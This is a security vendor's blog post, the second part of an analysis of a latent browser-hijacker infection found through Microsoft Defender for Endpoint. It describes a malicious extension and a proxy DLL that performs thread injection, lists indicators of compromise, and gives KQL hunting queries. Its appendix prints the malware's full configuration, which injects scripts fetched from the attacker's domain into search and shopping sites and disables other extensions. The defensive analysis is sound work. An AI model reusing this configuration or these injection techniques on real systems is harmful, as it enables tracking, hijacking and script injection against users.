White Hat journey to MXDR
Get to know more about White Hat's journey in the Microsoft partnership evolution.
Top Categories
Spotlight
Week News
When artificial intelligence is the target and not the tool of the attack…
Developers in the crosshairs – why are there more and more cyber attacks against software vendors?
Analysing a latent malware infection on a recently MDE-onboarded machine (Part 2)
Analysing a latent malware infection on a recently MDE-onboarded machine (Part 1)
Analysing a latent malware infection on a recently MDE-onboarded machine (Part 2)
Recently, an interesting latent malware infection was found on a newly onboarded machine at one of our clients (Client). Microsoft Defender for Endpoint (MDE) reported anomalies about the computer shortly after onboarding, but uncovering the inner workings of the malware and the infection methods required thorough investigation We present the second part of the investigation in this article with the Client’s approval.
(For the Part 1 see our previous post: https://whitehat.eu/analysing-a-latent-malware-infection-on-a-recently-mde-onboarded-machine/)
Malware analysis
The browser extension
Continuing on, we loaded the extension standalone into a clean browser inside a virtual machine (VM) to inspect the related network connections and communication. For the investigation, the VM internet connection was proxied over Burp Proxy.
The extension was loaded into a fresh, up-to-date Edge browser. After the initial loading, the extension showed the attributes of small size, clean icon, and empty name:
The extension in the toolbar gave nothing as depicted below:
After the installation of the extension, the malware started communicating with the “de.withtls[.]net” domain to register itself and obtained the configuration in JSON structure (see Appendix 1).
For example, in this JSON, there are various advertising-related German domain entries to keep track of:
The extension can inject arbitrary externally hosted JS file as well into any visited webpage:
Another aspect of the extension is that it is proxying any search term over the malicious actor infrastructure. Here the tested search term was “How to download more RAM” in Google, and a response communication came back with a yahoo search term:
Furthermore, the extension has a Google-Analytics identifier, giving the ability to the attacker to further track the victim trough the visited sites, in addition it injects standard Google trackers into any page that the user opens to keep the tracking ability up.
Reverse engineering the hijacker dll
Since we used Edge browser in our lab environment, the malware installed the fake cryptbase.dll at the following path:
C:\Program Files (x86)\Microsoft\Edge\Application\cryptbase.dll.
The static analysis presented the main functionalities and apparent goals of the executable, leading us to look after any thread injection, as it manipulates memory page protection to change it to a Read-Write-Execute and suspend – inject – resume thread:
We loaded the sample in disassembler to follow the execution flow. At first, it loaded the legitimate cryptbase.dll from the System32 folder.
The target thread is specified in the code that will be injected. In our case, it was the so-called NetGetJoinInformation’s thread, in which the shellcode has been injected.
After that, it enumerates the threads in the snapshot created by CreateToolhelp32Snapshot API, injects its shellcode and changes the protection of the targeted memory page to RWX.
Here is the thread injection itself in the code. At the middle, it updates the target thread’s instruction pointer (RIP register) to point to the shellcode, which was written into the target process’ memory:
Regarding this thread injection technique, we highly recommend the following article which gives information from the perspective of red teams in detail:
Indicators of compromise
Domains:
- de.mynodejs[.]net
- updatepush[.]com
- de.withtls[.]net (browser extension)
- g.httpsweb[.]com (browser extension)
- jspixel[.]com (browser extension)
- clinedafi[.]net (browser extension)
Files, packages:
- Vulnerable official Node.js end-of-life version in default location: node-v6.10.3-x86.msi
SHA256:d4000be1329737bd2f4c2e54abc939ca249c11cbcc8898240fece37cb74cf09f - Themida packed cpython exe component. SHA256:
f87ed053f4d26ad33aee5e574087aedaa65d932854b7cb065893e1c0fa5db3d5 - Proxy-dlls in browser’s folder:
- C:\Program Files (x86)\Microsoft\Edge\Application\cryptbase.dll
- C:\Program Files (x86)\Google\Chrome\Application\version.dll
Appendix 1 – Browser extension JSON configuration
{
"xconfig": {
"livejs": {
"active": true,
"goNuclear": false,
"useTheForce": true
},
"redir": {
"active": true,
"unblockAfter": 600000
},
"hiddenWindow": {
"windowCloseTimeout": 600000,
"openAlways": true
},
"gTracker": {
"active": false,
"url": "https://data.ad-count.com/g/"
},
"urlCollector": {
"active": false,
"url": "https://data.ad-count.com/url/",
"blacklist": []
},
"chainTracker": {
"active": false,
"url": "https://data.ad-count.com/ct/"
},
"unblockAll": {
"active": true,
"matchWWW": true,
"domains": [
"kostenlos.de",
"gutscheine.biz",
"gutscheinlager.de",
"sale-forever.de",
"shopping-rabatt.de",
"couponster.de",
"sparwelt.de",
"gutscheinagent.de",
"gutscheinbox.de",
"gutscheingirl.de",
"gutscheintabelle.de",
"derbestegutschein.de",
"gutscheine.de",
"gutschein.de",
"gutscheinpony.de",
"gutscheine.com",
"gutscheincodes.de",
"coupons4u.de",
"gutscheinsammler.de",
"mydealz.de",
"gutscheine-oase.de"
]
},
"derailer": {
"domainRedirects": [
[
"www.searchfolder.net/1",
"https://www.searchfolder.net/1?url={URL}"
],
[
"laserveradedomaina.com",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"workupgrade.thebestcontentsafesitealways.stream",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"target.ok.de",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"letsupdateourdomain.com",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"www.onclickmax.com",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"syndication.exdynsrv.com",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"ladomainadeserver.com",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"onclkds.com",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"www.greatdexchange.com",
"https://trends.google.com/trends/hottrends/visualize"
],
[
"go.oclasrv.com",
"https://trends.google.com/trends/hottrends/visualize"
]
]
},
"telemetry": {
"active": true,
"account": "UA-10XXXXXX5-10",
"url": "https://www.jspixel.com/p/",
"headers": [
[
"X-AnalPixel",
"1.0"
]
]
},
"extmgr": {
"active": true,
"reportURL": "https://de.withtls.net/ext?{std}",
"delaySet": 30,
"tempTimeout": 15,
"mode": "temp",
"actions": {
"pdffkfellgipmhklpdmokmckkkfcopbh": {
"enable": false
},
"bgnkhhnnamicmpeenaelnjfhikgbkllg": {
"enable": false
},
"odfafepnkmbhccpbejgmiehpchacaeak": {
"enable": false
},
"cjpalhdlnbpafiamejdnhcphjbkeiagm": {
"enable": false
},
"gighmmpiobklfepjocnamgkkbiglidom": {
"enable": false
},
"ndcileolkflehcjpmjnfbnaibdcgglog": {
"enable": false
},
"gmgoamodcdcjnbaobigkjelfplakmdhh": {
"enable": false
},
"cfhdojbkjhnklbpkdaibdccddilifddb": {
"enable": false
}
}
},
"jsRunner": {
"active": true,
"defaults": null,
"matchRules": [
{
"selectors": [
[
"matches",
"*"
]
],
"htmlScripts": [
"https://de.withtls.net/data/runner/ga.html?{std}"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"matches",
"*://www.google.*"
],
[
"matchesPath",
"/search"
]
],
"htmlScripts": [
"https://de.withtls.net/data/runner/gas.html?{std}"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"matches",
"*://www.bing.*"
],
[
"matchesPath",
"/search"
]
],
"htmlScripts": [
"https://de.withtls.net/data/runner/bing.html?{std}"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"matches",
"*://www.google.*"
],
[
"matchesPath",
"/search"
]
],
"scripts": [
"https://de.withtls.net/data/runner/pst.js?{std}&dc=1"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"any",
[
[
"matches",
"*://anonym.de"
],
[
"matches",
"*://www.yadore.com"
],
[
"matches",
"*://yadex.com"
]
]
]
],
"scripts": [
"https://de.withtls.net/u/d?{std}"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"matches",
"*://www.amazon.*"
]
],
"scripts": [
"https://de.withtls.net/data/runner/asin.js?{std}&dc=1"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"matches",
"*://www.ebay.de"
]
],
"scripts": [
"https://de.withtls.net/data/runner/eb_search.js?{std}&dc=1"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"any",
[
[
"matches",
"*://www.google.*"
]
],
[
"matchesPath",
"/search"
]
]
],
"scripts": [
"https://de.withtls.net/data/runner/gg_search.js?{std}&dc=1"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"matches",
"*://www.amazon.de"
],
[
"matchesPath",
"/s"
]
],
"scripts": [
"https://de.withtls.net/data/runner/az_search.js?{std}&dc=1"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"any",
[
[
"matches",
"*://bing.com"
],
[
"matches",
"*://www.bing.com"
]
],
[
"matchesPath",
"/search*"
]
]
],
"scripts": [
"https://de.withtls.net/data/runner/bg_search.js?{std}&dc=1"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"any",
[
[
"matches",
"*://*.search.yahoo.com"
],
[
"matches",
"*://search.yahoo.com"
]
],
[
"matchesPath",
"/search*"
]
]
],
"scripts": [
"https://de.withtls.net/data/runner/yo_search.js?{std}&dc=1"
],
"timeout": null,
"delay": null,
"ttl": null
},
{
"selectors": [
[
"matches",
"*://*.kelkoogroup.net"
],
[
"matchesPath",
"/go"
]
],
"scripts": [
"https://de.withtls.net/data/runner/kk_check.js?{std}&dc=1"
],
"timeout": null,
"delay": null,
"ttl": null
}
]
},
"backgroundPage": {
"active": false,
"url": "http://bg.jspixel.com/backgroundPage2.html?{std}"
},
"notifier": {
"domainNotifications": [
[
[
"premiumsearchtech.com/c.php*"
],
"https://data.ad-count.com/notifier/?{std}"
]
]
}
},
"domains": {
"id": "merge#1686890254.2937276",
"url": "https://de.withtls.net/data/domain/merge.dat?iid=CC05XXXX-XXXX-XXXX-XX85-BD5D5C36E266&v=4.28&ver=2.4.11&tp=e&ts=1686920420&dlid=merge"
},
"livejs": {
"id": "gtm_1.0#1593605330.978869",
"url": "https://de.withtls.net/get?iid=CC05XXXX-XXXX-XXXX-XX85-BD5D5C36E266&v=4.28&ver=2.4.11&tp=e&ts=1686920420&ljsid=gtm_1.0"
}
}
Appendix 2 – KQL Series
DeviceNetworkEvents
| where RemoteUrl contains "withtls.net"
DeviceProcessEvents
| where InitiatingProcessSHA256 contains "518ea2f7e77780ad2eaeadaa818c8d45ac480a62d8b503f88e25412572ebce49"
| summarize count() by DeviceName
DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
| where RegistryValueName == "SpyNetReporting"
| where RegistryValueData contains "0"
DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Spynet"
| where RegistryValueName == "SubmitSamplesConsent"
//| where RegistryValueData contains "2"
DeviceRegistryEvents
| where RegistryKey contains @"SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Path"
| where RegistryValueName == @"C:\"
Previous post
Analysing a latent malware infection on a recently MDE-onboarded machine (Part 1)
Recently, an interesting latent malware infection was found on a newly onboarded machine at one of our clients (Client). Microsoft Defender for Endpoint (MDE) reported anomalies about the computer shortly after onboarding, but uncovering the inner workings of the malware [...]